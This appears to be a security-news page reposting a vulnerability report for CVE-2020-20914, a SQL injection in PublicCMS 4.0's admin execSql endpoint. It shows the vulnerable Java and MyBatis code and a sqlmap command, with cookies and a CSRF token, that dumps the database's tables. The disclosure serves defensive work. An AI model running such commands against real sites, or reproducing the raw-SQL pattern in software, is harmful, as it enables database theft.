Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2020-20914: There is a SQL Injection vulnerability that can dump the database · Issue #29 · sanluan/PublicCMS

SQL Injection vulnerability found in San Luan PublicCMS v.4.0 allows a remote attacker to execute arbitrary code via the sql parameter.

CVE
Open in Source
#sql#csrf#vulnerability#web#js

Where SQL injection vulnerability code appears
com.publiccms.controller.admin.sys.SysSiteAdminController

@Csrf

public String execSql(@RequestAttribute SysSite site, @SessionAttribute SysUser admin, String sql, HttpServletRequest request,

        ModelMap model) {

    if (ControllerUtils.verifyCustom("noright", !siteComponent.isMaster(site.getId()), model)) {

        return CommonConstants.TEMPLATE_ERROR;

    }

    if (-1 < sql.indexOf(CommonConstants.BLANK_SPACE)) {

        String type = sql.substring(0, sql.indexOf(CommonConstants.BLANK_SPACE));

        try {

            if ("update".equalsIgnoreCase(type)) {

                model.addAttribute("result", sqlService.update(sql));

            } else if ("insert".equalsIgnoreCase(type)) {

                model.addAttribute("result", sqlService.insert(sql));

            } else if ("delete".equalsIgnoreCase(type)) {

                model.addAttribute("result", sqlService.delete(sql));

            } else {

                model.addAttribute("result", JsonUtils.getString(sqlService.select(sql)));

            }

        } catch (Exception e) {

            model.addAttribute("error", e.getMessage());

        }

        model.addAttribute("sql", sql);

        logOperateService.save(new LogOperate(site.getId(), admin.getId(), LogLoginService.CHANNEL_WEB_MANAGER,

                "execsql.site", RequestUtils.getIpAddress(request), CommonUtils.getDate(), JsonUtils.getString(model)));

    }

    return CommonConstants.TEMPLATE_DONE;

}`

sqlService.update(sql)=>SqlMapper.xml
<mapper namespace="com.publiccms.logic.mapper.tools.SqlMapper"> <select id="select" parameterType="String" resultType="map">${sql}</select> <select id="query" parameterType="String" resultType="map">${sql}</select> <insert id="insert" parameterType="String">${sql}</insert> <update id="update" parameterType="String">${sql}</update> <delete id="delete" parameterType="String">${sql}</delete> </mapper>

[20:45:23] [INFO] the back-end DBMS is MySQL web application technology: JSP
back-end DBMS: MySQL >= 5.0.12

view the tables in PublicCMS databases:
python sqlmap.py -u http://localhost:8080/publiccms/admin/sysSite/execSql.do?navTabId=sysSite/sql --cookie “JSESSIONID=70640223FE44003BC029AAAB54D24BC8; PUBLICCMS_ADMIN=1_2df43cfb-9546-4cdb-8150-6482f1b028de;Hm_lvt_4674b425370d9f190347b297042ae0b1=1552053320” --data “_csrf=2df43cfb-9546-4cdb-8150-6482f1b028de&sql=111” --level 5 -D publiccms --tables

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE